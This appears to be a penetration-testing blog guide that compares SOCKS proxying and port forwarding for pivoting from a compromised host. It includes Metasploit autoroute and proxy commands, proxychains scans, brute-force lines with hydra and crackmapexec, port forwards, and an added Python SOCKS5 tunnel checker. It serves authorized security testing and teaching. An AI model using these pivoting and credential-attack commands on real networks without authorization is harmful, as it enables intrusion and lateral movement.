Using SOCKS Proxy vs. Port Forwarding: A Pentester’s Guide
When performing internal penetration testing, gaining a foothold is just the beginning. The next step is pivoting — finding a way to explore deeper into restricted networks. Two powerful techniques for this are SOCKS proxying and port forwarding. Both serve different purposes, and knowing when to use each is key.
Table of Contents
- What is a SOCKS Proxy?
- Setting Up SOCKS Proxy with Metasploit
- Configuring ProxyChains
- Scanning and Enumeration
- Tools That Work with ProxyChains
- What is Port Forwarding?
- Side-by-Side Comparison
- When to Use What
- Pro Tips
- Final Thoughts
1. What is a SOCKS Proxy?
A SOCKS proxy works at the transport layer and forwards any TCP traffic through a pivot host. It allows your tools (e.g., Nmap, CrackMapExec, Hydra) to operate as if they were on the internal network.
It’s like creating a VPN through your compromised host, allowing dynamic and flexible access.
2. Setting Up SOCKS Proxy with Metasploit
sessions -i 1
run autoroute -s 10.10.10.0/24
background
use auxiliary/server/socks_proxy
set SRVPORT 1080
run
This starts a SOCKS proxy listening on port 1080; the autoroute entry makes Metasploit send traffic for 10.10.10.0/24 through your Meterpreter session (background it first, since the socks_proxy module is loaded from the msfconsole prompt, not from inside Meterpreter).
3. Configuring ProxyChains
Edit /etc/proxychains.conf, comment out the default socks4 127.0.0.1 9050 line, and add:
socks5 127.0.0.1 1080
Use proxychains to route tools through the SOCKS tunnel (only full TCP connect scans work through a SOCKS proxy, hence -sT and -Pn; SYN scans and ICMP ping cannot be tunnelled):
proxychains nmap -sT -Pn -n -p- 10.10.10.0/24
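What the socks5 127.0.0.1 1080 line makes proxychains do for every tunnelled connection, as an added example that is not from the original post: the client greeting, the CONNECT request and the reply codes of RFC 1928, plus a small check_tunnel() that performs the same handshake a proxychains curl test would. The proxy address 127.0.0.1:1080 and the target 10.10.10.10:445 are assumed from the post.

```python
import socket
import struct

# SOCKS5 (RFC 1928) constants: version, CONNECT command, address types,
# and the reply codes a proxy can return for a CONNECT request.
SOCKS_VERSION = 0x05
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN = 0x01, 0x03
REPLY_TEXT = {
    0x00: "succeeded", 0x01: "general failure", 0x02: "not allowed by ruleset",
    0x03: "network unreachable", 0x04: "host unreachable",
    0x05: "connection refused", 0x06: "TTL expired",
    0x07: "command not supported", 0x08: "address type not supported",
}

def build_greeting() -> bytes:
    """Client hello offering one auth method: 0x00 (no authentication)."""
    return bytes([SOCKS_VERSION, 0x01, 0x00])

def build_connect_request(host: str, port: int) -> bytes:
    """CONNECT request. Dotted-quad hosts are sent as IPv4; anything else is
    sent as a domain name so the proxy resolves it (proxychains' proxy_dns)."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:
        name = host.encode("idna")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)

def parse_reply(data: bytes) -> tuple[bool, str]:
    """Decode the proxy's CONNECT reply into (ok, human-readable reason)."""
    if len(data) < 2 or data[0] != SOCKS_VERSION:
        return False, "not a SOCKS5 reply"
    return data[1] == 0x00, REPLY_TEXT.get(data[1], f"unknown reply 0x{data[1]:02x}")

def check_tunnel(proxy: tuple, target: tuple, timeout: float = 5.0) -> tuple[bool, str]:
    """Live check: ask the SOCKS proxy to CONNECT to target and report the verdict."""
    with socket.create_connection(proxy, timeout=timeout) as s:
        s.sendall(build_greeting())
        hello = s.recv(2)
        if hello != bytes([SOCKS_VERSION, 0x00]):
            return False, f"proxy rejected the no-auth method: {hello.hex()}"
        s.sendall(build_connect_request(*target))
        return parse_reply(s.recv(10))

if __name__ == "__main__":
    # Assumed layout from the post: proxy on 127.0.0.1:1080, target 10.10.10.10:445.
    print(check_tunnel(("127.0.0.1", 1080), ("10.10.10.10", 445)))
```

A reply of "host unreachable" or "connection refused" tells you whether the route through the pivot is missing or only the target port is closed, which a failed proxychains curl does not distinguish.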
4. Scanning and Enumeration
Targeted scan:
proxychains nmap -sT -Pn -n -p 80,135,445,3389 10.10.10.10
Version detection:
proxychains nmap -sT -Pn -sV 10.10.10.10
5. Tools That Work with ProxyChains
| Tool | Purpose |
|---|---|
| crackmapexec | Enumerate SMB, WinRM |
| xfreerdp | RDP access via proxy |
| hydra | Brute-force services |
| smbclient | Access Windows shares |
| nmap | Internal scanning |
| impacket tools | Remote execution (e.g., wmiexec.py) |
| msfconsole | Route modules via SOCKS proxy |
Examples:
proxychains crackmapexec smb 10.10.10.20 -u user -p pass
proxychains hydra -l admin -P rockyou.txt rdp://10.10.10.20
proxychains xfreerdp /u:user /p:pass /v:10.10.10.20
6. What is Port Forwarding?
Port forwarding binds a single local port on your attacker machine and relays everything sent to it, through the pivot, to one specific port on an internal target.
Example with SSH:
ssh -L 3389:10.10.10.20:3389 user@pivot
Example with Metasploit (Meterpreter):
portfwd add -l 4444 -p 3389 -r 10.10.10.20
This forwards local port 4444 to RDP (3389) on 10.10.10.20, so connecting to 127.0.0.1:4444 reaches the target's RDP service.
Best For:
- GUI apps like RDP, VNC, or web access
- Single-port scenarios
Limitations:
- One tunnel per port
- Tedious for large-scale recon
- Static (no dynamic routing)
7. Side-by-Side Comparison
| Feature | SOCKS Proxy | Port Forwarding |
|---|---|---|
| Setup Effort | One-time setup | Per-host, per-port |
| Multi-host Recon | ✅ Yes | ❌ No |
| Supports Tools (Nmap, CME) | ✅ Yes | ❌ Limited |
| Ideal for GUI Apps | ⚠️ Okay | ✅ Excellent |
| Traffic Scope | All TCP traffic | Single port/service |
| UDP Support | ❌ No | ⚠️ Some workarounds |
| Proxychains Compatible | ✅ Yes | ❌ Not needed |
8. When to Use What
| Situation | Use This |
|---|---|
| Need to access RDP/Web GUI/VNC? | Port Forwarding |
| Need to scan internal subnets? | SOCKS Proxy |
| Want to brute-force credentials at scale? | SOCKS Proxy |
| Using Metasploit + Meterpreter? | Either |
| Quick access to a single internal port? | Port Forwarding |
| Pivoting across complex networks? | SOCKS Proxy |
9. Pro Tips
- Combine SOCKS for recon with port forwarding for GUI access
- Use proxychains-ng for better DNS handling and multiple chained proxies
- Use tools like ligolo or chisel for stealthy SOCKS over HTTPS
- Test tunnels with proxychains curl <target>
10. Final Thoughts
If you’re scanning and enumerating: use a SOCKS proxy.
If you’re clicking and typing into a GUI app: use port forwarding.
Port forwarding is surgical.
SOCKS proxy is operational warfare.
